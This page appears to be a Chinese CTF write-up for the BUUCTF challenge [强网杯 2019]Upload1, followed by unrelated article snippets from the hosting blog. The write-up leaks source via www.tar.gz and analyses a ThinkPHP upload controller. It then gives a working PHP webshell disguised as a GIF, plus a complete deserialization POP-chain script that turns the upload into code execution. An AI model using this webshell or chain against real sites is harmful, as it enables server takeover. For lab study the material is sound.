当前位置：首页 > news >正文

62,【2】 BUUCTF WEB [强网杯 2019]Upload1

news 2025/5/30 12:50:26

进入靶场

此处考点不是SQL，就正常注册并登录进去

先随便传一个

进行目录扫描，我先用爆破代替

先随便后面写个文件名

为了提供payload位置

www.tar.gz真的存在

返回浏览器修改url就自动下载了

看到tp5,应该是ThinkPHP5框架

参考此博客的思路方法c[强网杯 2019]Upload-CSDN博客

发现application

发现

断点

判断有没有注册

断点

看到login_check想到反序列化

都在提示我们用cookie传序列化字符串

上传部分也注意一下

<?php
// 命名空间声明
namespace app\web\controller;// 引入 think\Controller 类
use think\Controller;class Profile extends Controller
{// 定义类属性public $checker;public $filename_tmp;public $filename;public $upload_menu;public $ext;public $img;public $except;// 构造函数public function __construct(){// 创建 Index 类的实例作为检查器$this->checker = new Index();// 使用客户端的 IP 地址生成一个唯一的上传目录名（通过 MD5 哈希）$this->upload_menu = md5($_SERVER['REMOTE_ADDR']);// 尝试切换到上级目录下的 public/upload 目录@chdir("../public/upload");// 如果该目录不存在，则创建该目录if (!is_dir($this->upload_menu)) {@mkdir($this->upload_menu);}// 切换到生成的上传目录@chdir($this->upload_menu);}// 处理图片上传的方法public function upload_img(){// 检查是否有检查器实例if ($this->checker) {// 调用检查器的 login_check 方法检查用户是否登录，如果未登录重定向到首页if (!$this->checker->login_check()) {$curr_url = "http://". $_SERVER['HTTP_HOST']. $_SERVER['SCRIPT_NAME']. "/index";$this->redirect($curr_url, 302);exit();}}// 检查是否有文件上传if (!empty($_FILES)) {// 获取上传文件的临时存储路径$this->filename_tmp = $_FILES['upload_file']['tmp_name'];// 将上传文件的名称进行 MD5 哈希并添加.png 后缀$this->filename = md5($_FILES['upload_file']['name']). ".png";// 调用文件扩展名检查方法$this->ext_check();}// 如果文件扩展名通过检查if ($this->ext) {// 检查文件是否为图片if (getimagesize($this->filename_tmp)) {// 将临时文件复制到最终存储位置@copy($this->filename_tmp, $this->filename);// 删除临时文件@unlink($this->filename_tmp);// 存储图片的完整路径$this->img = "../upload/$this->upload_menu/$this->filename";// 调用更新图片信息的方法$this->update_img();} else {// 如果文件不是图片，显示错误信息并重定向到首页$this->error('Forbidden type!', url('../index'));}} else {// 如果文件扩展名不通过检查，显示错误信息并重定向到首页$this->error('Unknow file type!', url('../index'));}}// 更新用户头像信息到数据库和 cookie 的方法public function update_img(){// 从数据库中查找用户信息$user_info = db('user')->where("ID", $this->checker->profile['ID'])->find();// 如果用户没有头像且存在新上传的头像if (empty($user_info['img']) && $this->img) {// 将头像信息更新到数据库中if (db('user')->where('ID', $user_info['ID'])->data(["img" => addslashes($this->img)])->update()) {// 更新 cookie 中的用户信息$this->update_cookie();// 显示成功信息并跳转到主页$this->success('Upload img successful!', url('../home'));} else {// 如果更新失败，显示错误信息并跳转到首页$this->error('Upload file failed!', url('../index'));}}}// 更新 cookie 中的用户信息public function update_cookie(){// 将头像信息更新到检查器的 profile 信息中$this->checker->profile['img'] = $this->img;// 将序列化并 base64 编码后的用户信息存储到 cookie 中，有效期 1 小时cookie("user", base64_encode(serialize($this->checker->profile)), 3600);}// 检查文件扩展名的方法public function ext_check(){// 将文件名按点分割，取最后一部分作为扩展名$ext_arr = explode(".", $this->filename);$this->ext = end($ext_arr);// 如果扩展名是 png，返回 1，否则返回 0if ($this->ext == "png") {return 1;} else {return 0;}}// 魔术方法 __get，用于获取不存在的属性public function __get($name){return $this->except[$name];}// 魔术方法 __call，用于调用不存在的方法public function __call($name, $arguments){if ($this->{$name}) {$this->{$this->{$name}}($arguments);}}
}

传个木马GIF89a<?php @eval($_POST['attack']);?>

得到图片路径

<?phpnamespace app\web\controller;
error_reporting(0);
class Profile
{public $checker;public $filename_tmp;public $filename;public $upload_menu;public $ext;public $img;public $except;public function __get($name){return $this->except[$name];}public function __call($name, $arguments){if($this->{$name}){$this->{$this->{$name}}($arguments);}}}class Register
{public $checker;public $registed;public function __destruct(){if(!$this->registed){$this->checker->index();}}}$profile = new Profile();
$profile->except = ['index' => 'img'];
$profile->img = "upload_img";
$profile->ext = "png";
$profile->filename_tmp = "./upload/5e6f2693d111128ec4f1d7336f65b87f/956f92ddc6f28ffb49090277e0b57cf7.png";
$profile->filename = "./upload/5e6f2693d111128ec4f1d7336f65b87f/956f92ddc6f28ffb49090277e0b57cf7.png";$register = new Register();
$register->registed = false;
$register->checker = $profile;echo urlencode(base64_encode(serialize($register)));

将代码运行赋值给cookie，并用蚁剑连接，就可得到flag

62,【2】 BUUCTF WEB [强网杯 2019]Upload1

进入靶场此处考点不是SQL，就正常注册并登录进去先随便传一个进行目录扫描，我先用爆破代替先随便后面写个文件名为了提供payload位置 www.tar.gz真的存在返回浏览器修改url就自动下载了看到tp5,应该是ThinkPHP5框架参考此博客的思路方法c[强网杯…...

编程日记 2025/1/22 15:37:40

Spring Boot 整合 ShedLock 处理定时任务重复执行的问题

🌷 古之立大事者，不惟有超世之才，亦必有坚忍不拔之志 🎐 个人CSND主页——Micro麦可乐的博客 🐥《Docker实操教程》专栏以最新的Centos版本为基础进行Docker实操教程，入门到实战 🌺《RabbitMQ》…...

编程日记 2025/1/22 15:34:37

常见Arthas命令与实践

Arthas 官网：https://arthas.aliyun.com/doc/，官方文档对 Arthas 的每个命令都做出了介绍和解释，并且还有在线教程，方便学习和熟悉命令。 Arthas Idea 的 IDEA 插件。这是一款能快速生成 Arthas命令的插件，可快速生成…...

编程日记 2025/1/22 15:29:29

Glide加载gif遇到的几个坑

Glide本身支持gif格式的动画加载，但是大多数情况下我们用Glide都是去加载一些静态图片，加载gif动态图的需求不是很多，因此这次使用Glide加载gif就遇到了一些令人匪夷所思的问题问题一：加载gif图片会有明显的卡顿通常情况下我们…...

编程日记 2025/1/22 15:28:27

STM32学习之通用定时器

1.1通用定时器介绍通用定时器具有基本定时器的所有特征，基本定时器只能递增计数，而通用定时器可以递减计数，可以中心对齐计数；也可以触发ADC和DAC，同时在更新事件，触发事件，输入捕获&#xff…...

编程日记 2025/1/22 15:27:24

MiniMax-Text-01——模型详细解读与使用

MiniMax发布了最新的旗舰款模型，MiniMax-Text-01。这是一个456B参数的MOE模型，支持最大4M上下文。今天我们来解读一下这个模型，最后会讲一下模型的使用方式和价格。先来看整体指标，以下图表分为三块指标，分别是文本能…...

编程日记 2025/1/22 15:23:20

Redis的Windows版本安装以及可视化工具

文章目录 redis安装redis安装包下载解压文件夹启动redis服务Redis路径配置环境变量打开redis客户端进行连接基础操作测试 redis可视化工具下载Redis Desktop Manager redis安装 redis安装包下载 windows版本readis下载：Releases tporadowski/redis 解压文件夹我…...

编程日记 2025/1/22 15:20:17

tensorflow源码编译在C++环境使用

https://tensorflow.google.cn/install/source?hlzh-cn查看tensorflow和其他需要下载软件对应的版本，最好一模一样 1、下载TensorFlow源码 https://github.com/tensorflow/tensorflow 2、安装编译protobuf（3.9.2） protobuf版本要和TensorFlo…...

编程日记 2025/1/22 15:19:16

第四届机器学习、云计算与智能挖掘国际会议

一、会议信息会议名称：第四届机器学习、云计算与智能挖掘国际会议（MLCCIM 2025） 会议地点：中国漠河会议时间：2025年7月21-25日支持单位：佛山市人工智能学会、佛山大学二、大会主席 …...

编程日记 2025/1/22 15:17:14

#漏洞挖掘# 一文了解什么是Jenkins未授权访问！！！

免责声明本教程仅为合法的教学目的而准备，严禁用于任何形式的违法犯罪活动及其他商业行为，在使用本教程前，您应确保该行为符合当地的法律法规，继续阅读即表示您需自行承担所有操作的后果，如有异议，请立即停…...

编程日记 2025/1/22 15:16:13

本系列文章全面的介绍了QT中的57种控件的使用方法以及示例，包括 Button(PushButton、toolButton、radioButton、checkBox、commandLinkButton、buttonBox)、Layouts(verticalLayout、horizontalLayout、gridLayout、formLayout)、Spacers(verticalSpacer、horizontalSpacer)、…...

编程日记 2025/1/22 15:14:11

【Vim Masterclass 笔记25】S10L45：Vim 多窗口的常用操作方法及相关注意事项

文章目录 S10L45 Working with Multiple Windows1 水平分割窗口2 在水平分割的新窗口中显示其它文件内容3 垂直分割窗口4 窗口的关闭5 在同一窗口水平拆分出多个窗口6 关闭其余窗口7 让四个文件呈田字形排列8 光标在多窗口中的定位9 调节子窗口的尺寸大小10 变换子窗口的位置11…...

编程日记 2025/1/22 15:12:09

包文件分析器 Webpack Bundle Analyzer

webpack-bundle-analyzer 是一个非常有用的工具，用于可视化和分析 Webpack 打包生成的文件。这使得开发者能够更好地理解应用的依赖关系、包的大小，以及优化打包的机会。以下是关于 webpack-bundle-analyzer 的详细介绍，包括它的安装、使用以…...

编程日记 2025/1/22 15:07:54

代码随想录day14

二叉树的反转，采用迭代，只能用前序和后序遍历 /*** Definition for a binary tree node.* struct TreeNode {* int val;* TreeNode *left;* TreeNode *right;* TreeNode() : val(0), left(nullptr), right(nullptr) {}* TreeNode(i…...

编程日记 2025/1/22 15:03:37

react19新API之use()用法总结

React use() Hook 使用指南概述 use() 是 React 19 引入的新 Hook，它允许你在组件内部直接使用 Promise、Context 和其他可订阅的值。它是一个更通用的数据获取和订阅机制。基本语法 const value use(resource);主要用途 1. Promise 处理 function UserDet…...

编程日记 2025/1/22 15:00:27

67，【7】buuctf web [HarekazeCTF2019]Avatar Uploader 2(未完成版）

进入靶场和上一题一母同胞，先把上一题的答案拖进去看看区别在于上一题这块直接显示了flag，这里并没有看看源码加载不出来，ctrlu <p>Please upload a PNG image less th…...

编程日记 2025/1/22 14:57:34

ANSYS HFSS 中的相控天线阵列仿真方法

概述相控天线阵列系统广泛使用，从国防雷达应用到商业 5G 应用。设计这些天线阵列涉及复杂的数学运算，需要全波仿真。Ansys HFSS 全场 3D 电磁仿真软件可以在合理的时间内以较低的计算成本仿真复杂的相控阵天线系统，同时考虑复杂激励、环境&…...

编程日记 2025/1/22 14:56:14

stm32 L051 adc配置及代码实例解析

一 cude的设置： 1. 接口的基本设置： 2. 参数的设置： 二代码的逻辑： 1. 上面的直接生成代码，然后使用下面源码即可读到adc的数据： void adc_battery_start(void) {uint32_t ADC_value 0;HAL_ADC_Start(&…...

编程日记 2025/1/22 14:51:57

KUKA示教器仿真软件OfficeLite8.6.2，EthernetKRL3.1.3通信

一、准备软件。 1、vmware17.6.1 2、OfficeLite8.6.2 3、EthernetKRL3.1.3 4、KUKA Router 5、EthernetKRL_Server 通过网盘分享的文件：库卡相关软件链接: https://pan.baidu.com/s/1NwvR3RVP0edLBeZnnnCYvw 提取码: smys 二、安装vmware17.6.1 1、找到下载…...

编程日记 2025/1/22 14:45:31

Erlang语言的并发编程

Erlang语言的并发编程引言并发编程是现代软件开发中的一个重要领域，尤其是在面对需要高效处理大量任务的应用时。Erlang是一种专门设计用于并发编程的编程语言，由于其在电信和即时通信系统中的广泛应用，逐渐引起了开发者的关注。Erlang的…...

编程日记 2025/1/22 14:42:19

【数据挖掘实战】房价预测

本次对kaggle中的入门级数据集，房价回归数据集进行数据挖掘，预测房屋价格。本人主页：机器学习司猫白机器学习专栏：机器学习实战 PyTorch入门专栏：PyTorch入门深度学习实战：深度学习 ok，话不多…...

编程日记 2025/1/22 14:39:13

我的创作纪念日，纪念我的第512天

目录年末年初入围博客变动生活期待年末很快，2024年已经过去了，本想在跨年夜的时候营造一点小小的仪式感，结果也因为身体的原因放弃了，浑身感觉疼痛，躺在床上，闭上眼睛，什么也不…...

编程日记 2025/1/22 14:35:04

【科研建模】Pycaret自动机器学习框架使用流程及多分类项目实战案例详解

Pycaret自动机器学习框架使用流程及项目实战案例详解 1 Pycaret介绍2 安装及版本需求3 Pycaret自动机器学习框架使用流程3.1 Setup3.2 Compare Models3.3 Analyze Model3.4 Prediction3.5 Save Model4 多分类项目实战案例详解4.1 ✅ Setup4.2 ✅ Compare Models4.3 ✅ Experime…...

编程日记 2025/1/22 14:32:00